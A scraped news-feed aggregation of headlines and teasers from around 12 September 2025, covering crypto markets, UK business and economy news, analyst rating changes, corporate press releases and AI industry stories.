Article link

Date of publish: Fri, 12 Sep 2025 14:30:00 +0100

Exclusive: Half of PancakeSwap’s ‘random’ prize winners appear connected

PancakeSwap claims its trading competition winners were selected randomly, but blockchain records suggest over half of them belong to a cluster of linked wallets.

PancakeSwap’s trading competition was supposed to reward random winners, but blockchain records show that about half of the 1,700 winning wallets are part of connected clusters.

The competition was the second of its kind and structured for investors to earn points by trading the tokens of five sponsors from the Binance Alpha program: League of Traders (LOT), Bedrock DAO (BR), MilkyWay (MILK), NodeOps (NODE) and Moonveil (MORE).

To accumulate points, the trades had to be conducted on PancakeSwap, the top decentralized exchange (DEX) by total value locked on the Binance-founded BNB Chain. 

Read more

Article link

Date of publish: Fri, 12 Sep 2025 14:30:00 +0100

Dogecoin price rises despite latest delay of US DOGE ETF launch

Dogecoin gained around 4% to reach $0.26 despite Bloomberg’s Eric Balchunas reporting that the first US DOGE ETF faces another delay.

Dogecoin’s price rose Friday even as the launch of a US exchange-traded fund (ETF) tied to the memecoin was delayed again, according to a Bloomberg analyst.

According to CoinMarketCap data, Dogecoin (DOGE) increased by nearly 4% over the last 24 hours — reaching $0.2603 at the time of writing. The rise comes despite Bloomberg’s senior ETF analyst Eric Balchunas saying Thursday that the launch of a US DOGE ETF is delayed again.

According to a Sept. 8 US Securities and Exchange Commission (SEC) filing, the Rex-Osprey DOGE ETF (DOJE) was expected to list alongside Bonk (BONK), XRP (XRP), Bitcoin (BTC) and Trump Official (TRUMP) ETFs on Friday, Sept. 12. Still, Balchunas suggested that the listing is delayed until the middle of next week, likely Thursday.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 14:25:18 +0100

Stablecoins hit $300B on CoinMarketCap — Are we there yet?

The stablecoin market cap topped $300 billion on CoinMarketCap, but discrepancies across platforms like CoinGecko and DefiLlama highlight challenges in tracking crypto assets.

The stablecoin market is approaching a $300 billion capitalization, but figures differ widely across leading crypto data platforms, highlighting the challenges of measuring the fast-growing sector.

The total stablecoin market cap reached $300 billion on CoinMarketCap (CMC) on Thursday, but CoinGecko reported $291 billion and DefiLlama showed $289 billion on Friday, displaying significant discrepancies.

Rafaela Romano, ambassador at the crypto analytics platform Alphractal, told Cointelegraph that these discrepancies “will always exist” because each platform applies different methodologies when calculating market caps.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 14:12:05 +0100

Michael Saylor’s Bitcoin obsession: How it all started

Explore Michael Saylor’s Bitcoin playbook, Strategy’s debt-fueled purchases and the future outlook of corporate crypto investing.

Michael Saylor transformed MicroStrategy from a business intelligence firm into the world’s largest corporate Bitcoin holder.

Saylor’s conviction redefined corporate strategy, turning volatility into opportunity through long-term, dollar-cost averaging purchases.

His approach set the standard for institutional Bitcoin adoption despite concerns over dilution and debt.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 12:40:18 +0100

Bitcoin is ‘made for us’: Africa’s first treasury company eyes unique opportunity

Africa has its first Bitcoin treasury company, but its utility goes far deeper than publicly-listed stocks tied to BTC holdings on a balance sheet.

Bitcoin treasury companies are in vogue, and Africa has its first trading on the Johannesburg Stock Exchange. While the launch of Africa Bitcoin Corporation promises to attract billions of South African rand from capital markets, its founders believe Bitcoin’s impact on the continent remains in grassroots, retail adoption.

South Africa’s Altvest Capital grabbed headlines as it rebranded to Africa Bitcoin Corporation (ABC), the first publicly-listed company actively building a Bitcoin (BTC)-based treasury on the continent.

The company has a long-term goal to raise $210 million to buy Bitcoin using preferential share offerings and structured debt notes in the mould of the UK’s Smarter Web Company. Altvest announced its pivot into Bitcoin in February.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 12:30:16 +0100

How to turn crypto news into trade signals using Grok 4

Grok 4 can help you turn crypto headlines into market moves. It filters news and analyzes sentiment to create effective trade signals.

The AI crypto market is projected to expand from $3.7 billion in 2024 to $46.9 billion by 2034, highlighting the increasing reliance on AI tools like Grok 4 for trading.

Launched in mid-2025, Grok 4 quickly became one of the most visited AI tools, with active users rising by 17%, a trend expected to grow as traders adopt it.

Unlike basic news aggregators, Grok 4 offers real-time news analysis, sentiment evaluation and DeepSearch to filter noise and extract actionable trading insights.

Read more

Article link

Date of publish: Fri, 12 Sep 2025 12:27:38 +0100

News Ticker - markets.businessinsider.com

Boeing's CEO says it might have to delay its much-anticipated new plane, the 777X, once again

Article link

Date of publish: Fri, 12 Sep 2025 10:58:01 GMT

Hong Kong Smart Design Awards 2025: Final Stop at Maison & Objet Paris Showcasing Hong Kong's Designs to the World and Unlocking New Business Opportunities

<strong id="dateline">HONG KONG, HK / <a href='https://www.accessnewswire.com/' rel="noopener nofollow" target="_blank">ACCESS Newswire</a> / September 12, 2025 / Organized by the Hong Kong Exporters Association and sponsored by the Cultural and Creative Industries Development Agency of the Hong Kong Special Administrative Region Government, the...

Article link

Date of publish: Fri, 12 Sep 2025 10:56:00 GMT

Funding Circle Holdings plc: DSH-Director/PDMR Shareholding

<table border="0" cellpadding="0" cellspacing="0"><tr><td> Funding Circle Holdings plc (FCH) <br/> Funding Circle Holdings plc: DSH-Director/PDMR Shareholding <br/><br/>12-Sep-2025 / 11:53 GMT/BST<br/><br/><!-- sh_cad_1 --> <hr/><div><div> <p style="margin-top:0pt; margin-bottom:0pt; line-height:normal; font-size:

Article link

Date of publish: Fri, 12 Sep 2025 10:53:36 GMT

Dalata Hotel Group PLC: HOL-Holding(s) in Company*

<table border="0" cellpadding="0" cellspacing="0"><tr><td> Dalata Hotel Group PLC (DAL,DHG) <br/> Dalata Hotel Group PLC: HOL-Holding(s) in Company* <br/><br/>12-Sep-2025 / 11:39 GMT/BST<br/><br/><!-- sh_cad_1 --> <hr/><div><div> <p style="margin-top:0pt; margin-bottom:10pt; line-height:115%; font-size:14pt"><span...

Article link

Date of publish: Fri, 12 Sep 2025 10:39:25 GMT

EQS-DD: The Payments Group Holding GmbH & Co. KGaA: Stefan Menz, buy

<br/><br/><table border="0"><tr><td> <br/> Notification and public disclosure of transactions by persons discharging managerial responsibilities and persons closely associated with them <br/><br/> 12.09.2025 / 12:36 CET/CEST<br/>The issuer is solely responsible for the content of this announcement.<br/><br/><!-- sh_cad_1...

Article link

Date of publish: Fri, 12 Sep 2025 10:38:04 GMT

Gunnison Copper Corp. Presents in Red Cloud's Virtual Webinar Series

<img src="https://api.newsfilecorp.com/newsinfo/266148/208" id="208" width="2" height="2" style="width: 1px; height: 1px;border: 0px solid;">Phoenix, Arizona--(Newsfile Corp. - September 12, 2025) - <b>Gunnison Copper Corp.</b> (TSX: GCU) (OTCQB: GCUMF) (FSE: 3XS0) is pleased to announce that the company is presenting a live virtual corporate...

Article link

Date of publish: Fri, 12 Sep 2025 10:30:00 GMT

Zomedica's Fourth Friday at Four Webinar Returns: Spotlight on TRUVIEW(R) Digital Cytology Microscope - Transforming Veterinary Imaging

<i>Cutting-Edge Digital Microscopy System Featured in Monthly Series Showcasing Innovation in Veterinary Care</i> <strong id="dateline">ANN ARBOR, MI / <a href='https://www.accessnewswire.com/' rel="noopener nofollow" target="_blank">ACCESS Newswire</a> / September 12, 2025 / Zomedica Corp. (OTCQB:ZOMDF) (&quot;Zomedica&quot; or the...

Article link

Date of publish: Fri, 12 Sep 2025 10:30:00 GMT

BambooBuddies (BBDY) Is Now Available for Trading on LBank Exchange

<img src="https://api.newsfilecorp.com/newsinfo/266005/208" id="208" width="2" height="2" style="width: 1px; height: 1px;border: 0px solid;">Road Town, British Virgin Islands--(Newsfile Corp. - September 12, 2025) - LBank Exchange, a premier global digital asset trading platform, listed <b>BambooBuddies (BBDY)</b> at <b>11:00 (UTC) on August...

Article link

Date of publish: Fri, 12 Sep 2025 10:29:00 GMT

EQS-DD: SAP SE: Sebastian Steinhäuser, Receipt of 2360 SAP shares in connection with participation in the SAP employee participation programme ‘MOVE SAP’.

<br/><br/><table border="0"><tr><td> <br/> Notification and public disclosure of transactions by persons discharging managerial responsibilities and persons closely associated with them <br/><br/> 12.09.2025 / 12:23 CET/CEST<br/>The issuer is solely responsible for the content of this announcement.<br/><br/><!-- sh_cad_1...

Article link

Date of publish: Fri, 12 Sep 2025 10:25:08 GMT

EQS-PVR: Bilfinger SE: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution

<table border="0"><tr><td> EQS Voting Rights Announcement: Bilfinger SE <br/> Bilfinger SE: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution <br/><br/> 12.09.2025 / 12:22 CET/CEST<br/> Dissemination of a Voting Rights Announcement...

Article link

Date of publish: Fri, 12 Sep 2025 10:22:24 GMT

BBC News

Jaguar Land Rover suppliers 'face bankruptcy' due to cyber attack crisis

The government has been urged to "act fast" to protect hundreds of jobs following the cyber attack.

Article link

Date of publish: Fri, 12 Sep 2025 21:04:03 GMT

AstraZeneca pauses £200m Cambridge investment

Its decision comes as the industry says there is a lack of government investment and as the US pressures firms to invest there.

Article link

Date of publish: Fri, 12 Sep 2025 20:20:29 GMT

Seven million households missing out on benefits and support

A report from Policy in Practice says awareness, complexity and stigma are the main barriers stopping people claiming.

Article link

Date of publish: Fri, 12 Sep 2025 23:55:16 GMT

UK economy saw zero growth in July

The economy failed to grow following the biggest contraction in manufacturing output for a year.

Article link

Date of publish: Fri, 12 Sep 2025 11:47:24 GMT

South Korean workers detained in US raid arrive home

Media and some protesters gather at the airport as more than 300 workers detained in the US last week return.

Article link

Date of publish: Fri, 12 Sep 2025 07:46:12 GMT

We will build 1.5m homes, new housing secretary insists

Steve Reed tells the BBC the government is "absolutely committed" to the pledge, which was in Labour's election manifesto.

Article link

Date of publish: Fri, 12 Sep 2025 05:01:51 GMT

Will farming under solar panels take off?

Farming under solar panels is still in the early stages in India, but will it catch on?

Article link

Date of publish: Thu, 11 Sep 2025 23:01:08 GMT

Will the latest iPhone kill off the Sim card?

The iPhone Air will only have an eSim - will other phone makers also shift away from the familiar - but fiddly - plastic cards?

Article link

Date of publish: Fri, 12 Sep 2025 04:27:58 GMT

Warner Bros Discovery shares surge on buyout reports

The reported bid would be for a business which includes news network CNN, HBO, and the film studio behind Barbie and Harry Potter.

Article link

Date of publish: Thu, 11 Sep 2025 22:17:29 GMT

Jaguar Land Rover shutdown extended to next week

Staff in Solihull, Halewood and Wolverhampton have been told not to come into work until Wednesday.

Article link

Date of publish: Thu, 11 Sep 2025 16:52:37 GMT

US energy chief tells BBC nuclear fusion will soon power the world

AI will soon enable harnessing of the energy that powers the sun and stars, says Chris Wright

Article link

Date of publish: Thu, 11 Sep 2025 23:02:49 GMT

John Lewis losses nearly triple to £88m

The owner of the eponymous department store and Waitrose expects the business to return to profit.

Article link

Date of publish: Thu, 11 Sep 2025 12:12:21 GMT

US inflation rises ahead of key interest rate decision

The pace of price rises ticked up as focus turns to the next move by the US Federal Reserve.

Article link

Date of publish: Thu, 11 Sep 2025 14:58:04 GMT

Hyundai says opening of raided plant to be delayed

The Korean car maker says many of the arrested workers now want to get back home

Article link

Date of publish: Thu, 11 Sep 2025 18:15:58 GMT

Blow for UK drugs sector as Merck scraps £1bn expansion

The firm, known as MSD in Europe, said there has been a lack of investment in life sciences.

Article link

Date of publish: Thu, 11 Sep 2025 13:03:50 GMT

Ministers must do more on Lifetime Isa reform, say MPs

The Treasury Committee says the complex product, used by first-time buyers, needs an overhaul.

Article link

Date of publish: Wed, 10 Sep 2025 23:01:18 GMT

Firms will hesitate to invest in US after raid - S Korea president

More than 300 South Koreans who were arrested in the raid are due to return home on Friday.

Article link

Date of publish: Thu, 11 Sep 2025 04:32:01 GMT

Larry Ellison briefly becomes world's richest person

The Oracle cofounder's wealth temporarily overtook Musk's fortune, propelled by an AI boom.

Article link

Date of publish: Wed, 10 Sep 2025 20:55:26 GMT

Klarna valued at $19bn in debut on Wall Street

The buy-now, pay-later firm raises nearly $1.4bn as its shares start trading publicly.

Article link

Date of publish: Wed, 10 Sep 2025 20:08:12 GMT

Weleda launches inquiry into Nazi camp skin test claims

A new study alleges the skincare brand's product was used for human experiments by a Nazi doctor.

Article link

Date of publish: Wed, 10 Sep 2025 15:28:52 GMT

Jaguar Land Rover admits hackers may have taken data

The car-maker previously said there was no evidence that customers information had been taken.

Article link

Date of publish: Wed, 10 Sep 2025 13:43:57 GMT

Samantha Cameron's fashion label Cefinn to shut

The womenswear brand says higher costs and tough trading conditions have taken their toll.

Article link

Date of publish: Wed, 10 Sep 2025 14:04:13 GMT

Primark-owner shares sink after consumer spending warning

Shoppers are concerned about rising inflation, said George Weston, chief executive of ABF, the owner of Primark.

Article link

Date of publish: Wed, 10 Sep 2025 15:23:09 GMT

US watchdog launches review into economic data collection

The move follows White House criticism of the Bueau of Labor Statistics.

Article link

Date of publish: Wed, 10 Sep 2025 17:24:53 GMT

Contactless card payments could become unlimited

Card providers would be allowed to set their own contactless card payment limit, under the regulator's plans.

Article link

Date of publish: Wed, 10 Sep 2025 09:24:15 GMT

Ozempic-maker Novo Nordisk to cut 9,000 jobs

The Danish firm, which also produces Wegovy, has warned of increased pressure from "knock-off" drugs.

Article link

Date of publish: Wed, 10 Sep 2025 10:02:42 GMT

Strongbow and Jägermeister pull ads after watchdog probe

The social media ads were withdrawn after complaints over the way they presented their alcoholic drinks were upheld.

Article link

Date of publish: Wed, 10 Sep 2025 13:57:09 GMT

'We are playing with fire': Fears persist over battery storage

More battery energy storage facilities are needed around the world, but fire risks remain.

Article link

Date of publish: Wed, 10 Sep 2025 23:03:51 GMT

Publishers fear AI summaries are hitting online traffic

Google's AI overviews are diverting traffic away from online newspapers and other publications.

Article link

Date of publish: Mon, 08 Sep 2025 23:07:35 GMT

The US factory spending $100,000 a month more due to tariffs

The gulf between Trump's rhetoric and the reality on the ground is starting to show.

Article link

Date of publish: Mon, 08 Sep 2025 11:57:20 GMT

The Caribbean islands battling the region's 'highest murder rate'

Turks and Caicos Islands, a popular high-end tourist destination, is beset with violent crime.

Article link

Date of publish: Sun, 07 Sep 2025 23:41:57 GMT

Trump's tariffs are pushing food and drink exporters closer to China

Agricultural brokers tell the BBC there has been a surge of interest from exporters in trade with China.

Article link

Date of publish: Thu, 04 Sep 2025 23:19:09 GMT

The green steel firms looking to revive US steelmaking

Start-up firms have pilot plants for making steel with low carbon emissions, but can they scale up?

Article link

Date of publish: Thu, 04 Sep 2025 23:01:17 GMT

Lack of charging facilities a 'barrier' for electric lorries

Haulage firms are introducing electric heavy goods vehicles, but say many more chargers are needed.

Article link

Date of publish: Wed, 03 Sep 2025 23:01:15 GMT

Will drones deliver your next hot food order?

A Swedish firm hopes that drones will open up a new market for hot food delivery.

Article link

Date of publish: Mon, 01 Sep 2025 23:05:14 GMT

How oil has brought Russia, China and India closer

Russia's Vladimir Putin met China's and India's leaders in Tianjin in a show of solidarity.

Article link

Date of publish: Tue, 02 Sep 2025 08:28:59 GMT

How sheer luck made this tiny Caribbean island millions from its web address

Anguilla has the internet domain .ai and is earning a fortune selling the address to tech firms.

Article link

Date of publish: Mon, 01 Sep 2025 01:42:59 GMT

Thirsty data centres boom in drought-hit Mexico

Activists in Querétaro criticise state government for prioritising the data processing needs for US tech firms over their own citizens

Article link

Date of publish: Thu, 28 Aug 2025 23:03:41 GMT

How to stop AI agents going rogue

Agentic AI is taking decisions and acting on behalf of users, but how to stop that going wrong?

Article link

Date of publish: Tue, 26 Aug 2025 06:59:49 GMT

Rising cost of school uniform is scary, says mum

A school supplies charity says demand for its help has risen by up to 20% compared with last year.

Article link

Date of publish: Sat, 13 Sep 2025 05:29:06 GMT

Seven million households missing out on benefits and support

A report from Policy in Practice says awareness, complexity and stigma are the main barriers stopping people claiming.

Article link

Date of publish: Fri, 12 Sep 2025 23:55:16 GMT

Hundreds of families to get school uniform cash

More than 1,000 students will be given a £50 uniform voucher, Hull City Council said.

Article link

Date of publish: Fri, 12 Sep 2025 15:57:04 GMT

UK economy saw zero growth in July

The economy failed to grow following the biggest contraction in manufacturing output for a year.

Article link

Date of publish: Fri, 12 Sep 2025 11:47:24 GMT

When is the Budget and what might be in it?

Chancellor Rachel Reeves will set out her economic plans in her second Budget on 26 November.

Article link

Date of publish: Fri, 12 Sep 2025 10:05:41 GMT

The UK car industry is at a tipping point - can it be saved?

Tariffs, Brexit, pandemic havoc... All of this caused short-term disruption - but the impact concealed a deeper problem for the UK automotive industry

Article link

Date of publish: Tue, 12 Aug 2025 23:00:58 GMT

Trump's global tariffs 'victory' may well come at a high price

The US president considers it a win - but if this all triggers a foundational realignment, the results may not break in his favour

Article link

Date of publish: Thu, 31 Jul 2025 23:01:04 GMT

Labour might be down, but it's not necessarily out - voters reflect on a year in power

What’s gone wrong for Labour? 2024 voters delve into it, writes Laura Kuenssberg.

Article link

Date of publish: Sat, 05 Jul 2025 16:11:02 GMT

China's electric cars are becoming slicker and cheaper - but is there a deeper cost?

The future for EVs will inevitably involve China. But where does that leave the UK and Europe markets – and what of the questions around national security?

Article link

Date of publish: Mon, 09 Jun 2025 23:04:10 GMT

The secretive US factory that lays bare the contradiction in Trump's America First plan

An exclusive look inside the closely guarded factory the president wants to become a foundation stone for a US golden age.

Article link

Date of publish: Sun, 18 May 2025 21:55:21 GMT

How to get out of a customer service 'doom loop'

BBC Breakfast Business Presenter Emma Vardy has these tips for how to get complaints heard - and dealt with - when you're dealing with customer services.

Article link

Date of publish: Thu, 11 Sep 2025 14:48:45 GMT

Martin Lewis: Act now to save on your energy bills

Still on an energy price cap tariff? Martin Lewis has this warning for you ahead of the 2% rise on 1 October.

Article link

Date of publish: Fri, 05 Sep 2025 11:36:28 GMT

Short guide to saving money for freshers - by students

Three students share their savvy tips for saving money at university.

Article link

Date of publish: Thu, 04 Sep 2025 09:24:23 GMT

Football’s Financial Shame: The Story of the V11

Unveiling a hidden scandal affecting a group of former Premier League players.

Article link

Date of publish: Tue, 02 Sep 2025 05:00:00 GMT

Martin Lewis has this warning for women over 40

He explains how some women could be owed thousands of pounds in relation to their state pension.

Article link

Date of publish: Tue, 26 Aug 2025 09:24:58 GMT

Fortune | FORTUNE

One of the most common reasons that AI products fail? Bad data

Executives at Fortune’s Brainstorm Tech warned that you need to start with fundamentals before rolling out a complex new AI agent.

Article link

Date of publish: Fri, 12 Sep 2025 22:15:00 +0000

OpenAI’s deal with Microsoft could pave the way for a potential IPO

OpenAI has reached a preliminary deal with Microsoft that paves the way to convert its for-profit arm into a public benefit corporation (PBC).

Article link

Date of publish: Fri, 12 Sep 2025 15:53:29 +0000

Tether to launch U.S. stablecoin, appoints former Trump crypto guru Bo Hines as CEO of American expansion

Tether tapped crypto bank Anchorage Digital and its longtime partner Cantor Fitzgerald to issue the token.

Article link

Date of publish: Fri, 12 Sep 2025 15:20:59 +0000

Authorities say Charlie Kirk’s alleged assassin left behind bullet casings with antifascist messages and a plethora of gamer and Gen Z slang

"I will leave that up to you to interpret what those engravings mean," Utah Gov. Spencer Cox said, adding that one in particular "speaks for itself."

Article link

Date of publish: Fri, 12 Sep 2025 17:30:48 +0000

Agentic AI moves beyond hype—but true autonomy is still a ways off

At Fortune Brainstorm Tech, leaders from Zillow, Experian, Okta, and Salesforce agreed: Agents aren’t just smarter chatbots. But as early deployments show promise, big questions around security and trust remain.

Article link

Date of publish: Thu, 11 Sep 2025 15:40:29 +0000

Blackstone exec says elite Ivy League degrees aren’t good enough—new analysts need to ‘work harder’ and be nice 

Emotional intelligence, hard work, and interpersonal connection are essential to leadership success.

Article link

Date of publish: Fri, 12 Sep 2025 19:48:13 +0000

Ray Dalio calls for wealth ‘redistribution policy’ when AI and humanoid robots start to benefit the 1% to 10% more than everyone else

The hedge fund billionaire sees a "limited number of winners and a bunch of losers" with the 1% to 10% "benefiting a lot."

Article link

Date of publish: Fri, 12 Sep 2025 19:55:08 +0000

Hyundai CEO says ICE raid on Georgia plant set back its grand opening by two or three months

CEO José Muñoz said the delay estimate is based on foreign workers coming back to help.

Article link

Date of publish: Fri, 12 Sep 2025 15:09:48 +0000

Wall Street’s future hinges on a risky bet about what the American economy will do next

The future of markets ride on whether this risky bet pays off.

Article link

Date of publish: Fri, 12 Sep 2025 19:27:53 +0000

Former Goldman Sachs CEO during 2008 crash says markets are ‘due’ for a crisis: ‘It doesn’t matter that you can’t see where it’s coming from’

“There's a lot of 1% risk, but it's not a 1% risk that something bad will happen,” Lloyd Blankfein said in a recent interview.

Article link

Date of publish: Fri, 12 Sep 2025 19:22:53 +0000

All News

Stock market today: S&P 500 slips, but extends winning streak ahead of Fed meeting

Article link

Date of publish: 2025-09-12 20:20:50

TSX lower after index logs fresh record closing high

Article link

Date of publish: 2025-09-12 20:06:06

Weaker US job market is new normal—not recession amid Trump policy uncertainty:MRB

Article link

Date of publish: 2025-09-12 19:58:49

Jefferies gives 5 reasons why Asian stocks are rallying

Article link

Date of publish: 2025-09-12 17:30:20

Array Technologies hit with downgrade on tariffs and weak margins

Article link

Date of publish: 2025-09-12 17:06:10

Pfizer, Moderna, BioNTech trade lower amid report of vaccine link to child deaths

Article link

Date of publish: 2025-09-12 17:01:30

Why BofA says TOPIX and Nikkei have more room to run

Article link

Date of publish: 2025-09-12 16:25:00

Circle’s USDC growth, favorable regulation help outlook, but Oppenheimer Neutral

Article link

Date of publish: 2025-09-12 16:06:31

FTSE 100 today: The index and GBP slide; Ocado plunges

Article link

Date of publish: 2025-09-12 15:59:34

European stocks mixed; inflation, growth data in spotlight

Article link

Date of publish: 2025-09-12 15:49:47

Tesla’s chair dismisses concerns over Musk’s political activity

Article link

Date of publish: 2025-09-12 15:47:08

US beer sales slump on consumer strain hits Constellation and Molson Coors

Article link

Date of publish: 2025-09-12 15:19:07

UBS lifts KOSPI target to 3,550 on memory cycle and policy reform hopes

Article link

Date of publish: 2025-09-12 14:41:23

Alaska Air Group’s earnings about to take-off, says UBS as it upgrades stock

Article link

Date of publish: 2025-09-12 14:38:19

U.S. consumer sentiment moves lower in September - University of Michigan survey

Article link

Date of publish: 2025-09-12 14:31:12

AppLovin price target raised as Wedbush sees ’vast, growth potential

Article link

Date of publish: 2025-09-12 14:09:28

Mizuho downgrades Huntsman on China import pressure, dividend risk

Article link

Date of publish: 2025-09-12 13:59:52

Bitcoin price today: hovers around $115k amid rate cut bets, but caution remains

Article link

Date of publish: 2025-09-12 13:39:23

Robotaxis to make up 8% of China’s ride-hailing fleet by 2030: MS

Article link

Date of publish: 2025-09-12 13:37:22

Suspect in Kirk’s murder is 22-year-old Tyler Robinson, turned in by his dad

Article link

Date of publish: 2025-09-12 13:18:19

Tariffs squeezing RH’s margins, Telsey says downgrading furniture retailer

Article link

Date of publish: 2025-09-12 13:17:35

Oil prices bounce on talk of Russian sanctions; weekly gains expected

Article link

Date of publish: 2025-09-12 13:07:25

Why Stellantis shares are rallying this week

Article link

Date of publish: 2025-09-12 12:48:48

Early tests show Amazon and Walmart are price leaders in grocery delivery

Article link

Date of publish: 2025-09-12 12:46:10

US autos weathers tariffs as sales hold firm, easing EV rules boost outlook

Article link

Date of publish: 2025-09-12 12:40:59

More U.S. job market cooling may hit investors’ "Goldilocks" narrative - Barclays

Article link

Date of publish: 2025-09-12 12:29:46

Arista stock rally continues after an upbeat Analyst Day

Article link

Date of publish: 2025-09-12 12:19:05

Berenberg backs Avolta and SSP as U.S . air travel market growth accelerates

Article link

Date of publish: 2025-09-12 12:18:54

Mizuho hikes Broadcom price target on stronger AI and networking outlook

Article link

Date of publish: 2025-09-12 12:18:47

Trump says Kirk shooting suspect in custody

Article link

Date of publish: 2025-09-12 12:18:13

Adobe, Super Micro Computer and Warner Bros rise premarket; RH falls

Article link

Date of publish: 2025-09-12 12:03:39

Here are two possible market risks Goldman Sachs sees in the economic outlook

Article link

Date of publish: 2025-09-12 11:40:46

WBD + PSKY deal can get done above $16.80 per WBD share: analyst

Article link

Date of publish: 2025-09-12 11:34:22

Bernstein initiates Puma coverage with “outperform” rating as sales forecast dip

Article link

Date of publish: 2025-09-12 11:14:33

UBS lowers natural gas prices forecasts

Article link

Date of publish: 2025-09-12 11:10:03

BCA warns AI trade could unravel as hyperscaler cash flows dwindle

Article link

Date of publish: 2025-09-12 11:04:46

UBS sees upside risks for its STOXX Europe 600 price target

Article link

Date of publish: 2025-09-12 10:52:21

BofA raises price target for Alibaba amid "robust" AI demand

Article link

Date of publish: 2025-09-12 10:42:59

Mizuho downgrades Applied Materials on China competition risks

Article link

Date of publish: 2025-09-12 10:42:36

BCA upgrades MSCI China on attractive valuation compared to peers

Article link

Date of publish: 2025-09-12 10:39:57

Morgan Stanley Lists Top 5 Japanese Software Stocks

Article link

Date of publish: 2025-09-12 10:30:25

EU probe settlement, OpenAI deal lift Microsoft shares in premarket trade

Article link

Date of publish: 2025-09-12 10:26:56

Where to place your chips? Barclays backs Flutter as top gaming pick

Article link

Date of publish: 2025-09-12 10:24:56

Market history shows strong equity gains after rate cuts

Article link

Date of publish: 2025-09-12 10:22:07

Gold prices remain near record highs; Fed cut bets prompt weekly gains

Article link

Date of publish: 2025-09-12 10:12:56

Two 25%+ wins in Sept: Our AI-powered stock picker is now up 100%+ vs. the S&P 500

Article link

Date of publish: 2025-09-12 10:09:16

Morgan Stanley now see four straight 25-basis point Fed rate cuts. Here’s why.

Article link

Date of publish: 2025-09-12 10:03:13

Super Micro Computer shares rise on Nvidia Blackwell shipments

Article link

Date of publish: 2025-09-12 09:39:22

GTT coverage initiated at UBS with “buy” rating as LNG growth set to drive orders

Article link

Date of publish: 2025-09-12 09:25:48

2025 to mark the start of the new ’ABD’ trade: BofA’s Hartnett

Article link

Date of publish: 2025-09-12 09:23:22

Why Barclays thinks U.K. budget is unlikely to bring sharp betting tax increases?

Article link

Date of publish: 2025-09-12 09:22:44

Nomura flags a possible source of selling pressure in event of market pullback

Article link

Date of publish: 2025-09-12 09:16:20

U.K. inflation expectations rise as Bank of England survey shows uptick

Article link

Date of publish: 2025-09-12 09:09:11

Deutsche Bank downgrades Telenor to “hold” after 26% YTD rally

Article link

Date of publish: 2025-09-12 08:49:26

UBS raises gold price forecasts on Fed cut bets, dollar weakness

Article link

Date of publish: 2025-09-12 08:47:03

UBS upgrades Hannover Re to “buy” on strong resilience amid softening reinsurance

Article link

Date of publish: 2025-09-12 08:40:20

Google Cloud secures £400 mln U.K. Ministry of Defence sovereign cloud deal

Article link

Date of publish: 2025-09-12 08:37:26

JPM postpones ECB rate cut forecast to December after policy meeting

Article link

Date of publish: 2025-09-12 08:32:46

London-listed miners gain as precious metal prices strengthen

Article link

Date of publish: 2025-09-12 08:30:32

Dollar on track for weekly loss ahead of Fed meeting; sterling weakens post GDP

Article link

Date of publish: 2025-09-12 08:28:05

S&P 500 price target raised at Yardeni Research on upcoming Fed cuts

Article link

Date of publish: 2025-09-12 08:19:15

Deutsche Bank expects ECB’s next rate move only in 2026, and it’s a hike

Article link

Date of publish: 2025-09-12 08:14:30

Ocado crashes 10% as Kroger rethinks warehouse push in online pivot

Article link

Date of publish: 2025-09-12 08:11:17

Berenberg slashes CAML to “hold” after $10 mln buyback triggers share drop

Article link

Date of publish: 2025-09-12 07:58:30

UK imposes 100 new sanctions targeting Russia’s shadow fleet, war suppliers

Article link

Date of publish: 2025-09-12 07:40:07

U.S. futures muted after stocks jump; Adobe lifts outlook - what’s moving markets

Article link

Date of publish: 2025-09-12 07:38:27

Goldman Sachs cuts Novartis to “sell,” warns of 8% downside as generics bite

Article link

Date of publish: 2025-09-12 07:32:30

JPMorgan adds 17 names to European Catalyst Watch ahead of ’pivotal’ Q3 season

Article link

Date of publish: 2025-09-12 07:20:09

Deutsche Bank downgrades Argenx to “hold” after 40% rally, €655 PT intact

Article link

Date of publish: 2025-09-12 07:13:28

China set to accelerate crude stockpiling through 2026, Goldman says

Article link

Date of publish: 2025-09-12 06:53:06

Sabadell board rejects BBVA’s €15 bln takeover bid

Article link

Date of publish: 2025-09-12 06:28:40

U.K. economic growth flatlined in July

Article link

Date of publish: 2025-09-12 06:21:36

Political noise aside, demand drivers keep Vestas "overweight" at J.P. Morgan

Article link

Date of publish: 2025-09-12 06:06:08

ECB seen hitting 2% inflation without more rate cuts, says Patsalides – report

Article link

Date of publish: 2025-09-12 05:42:21

Apple iPhone Air launch delayed in China

Article link

Date of publish: 2025-09-12 05:38:05

Is India ready to pivot its services economy in the age of AI? Jefferies weighs in

Article link

Date of publish: 2025-09-12 05:28:50

Copper prices rise as Freeport says Graesberg mine to remain suspended

Article link

Date of publish: 2025-09-12 05:16:25

Alibaba, Baidu shares soar on reported shift to in-house AI chips

Article link

Date of publish: 2025-09-12 04:54:01

Meituan launches new AI agent to boost food delivery amid heightened competition

Article link

Date of publish: 2025-09-12 04:20:01

Evergrande Property shares surge 40% on potential takeover bids

Article link

Date of publish: 2025-09-12 04:13:27

Asia FX firms as US rate cut bets, dollar weakness persist despite sticky CPI

Article link

Date of publish: 2025-09-12 03:46:31

Asia stocks extend rally tracking Wall St record highs; tech sector leads gains

Article link

Date of publish: 2025-09-12 03:07:24

SK Hynix shares hit record high on AI memory development milestone

Article link

Date of publish: 2025-09-12 02:01:20

US to push G7 to target India, China with tariffs over Russian oil – FT

Article link

Date of publish: 2025-09-12 01:09:58

Nvidia, OpenAI set to announce UK data center investment next week- reports

Article link

Date of publish: 2025-09-12 00:42:45

US Treasury Sec Bessent, Chinese VP to meet in Madrid next week- Reuters

Article link

Date of publish: 2025-09-12 00:20:20

Microsoft, OpenAI say non-binding deal reached over for-profit transition

Article link

Date of publish: 2025-09-11 23:49:05

Stock market today: S&P 500 record run persists as bets on Fed rate-cut stay firm

Article link

Date of publish: 2025-09-11 20:23:28

TSX ends session with a fresh all-time high

Article link

Date of publish: 2025-09-11 20:14:07

Fed jumbo rate cut too ’dicey’ as core inflation still rising: Scotiabank

Article link

Date of publish: 2025-09-11 20:11:04

